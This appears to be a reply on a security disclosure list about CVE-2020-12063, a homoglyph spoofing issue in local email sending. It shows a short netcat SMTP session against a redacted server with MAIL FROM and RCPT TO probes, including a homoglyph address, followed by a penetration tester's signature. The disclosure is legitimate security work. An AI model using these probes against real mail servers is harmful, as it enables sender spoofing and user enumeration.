Re: spoofing of local email sender via a homoglyph attack

Related Vulnerabilities: CVE-2020-12063  
                # nc -v *** OMITTED *** 25
Connection to *** OMITTED *** 25 port [tcp/smtp] succeeded!
220 *** OMITTED *** ESMTP Postfix
mail from: userdoesnotexists () target com
250 2.1.0 Ok
rcpt to: test () target com

rcpt to: j??hn.doe () target com

rcpt to: existing.user () target com
250 2.1.5 Ok

---
PLPR:
Plamen Dimitrov
Penetration Tester, CEH & OSCP certified

Promise Solutions LTD
Penetration Testing and Managed Security services

https://www.promisedev.com
https://www.promiselabs.net
+359 883 22 05 12

On 2020-04-23 18:14, Solar Designer wrote: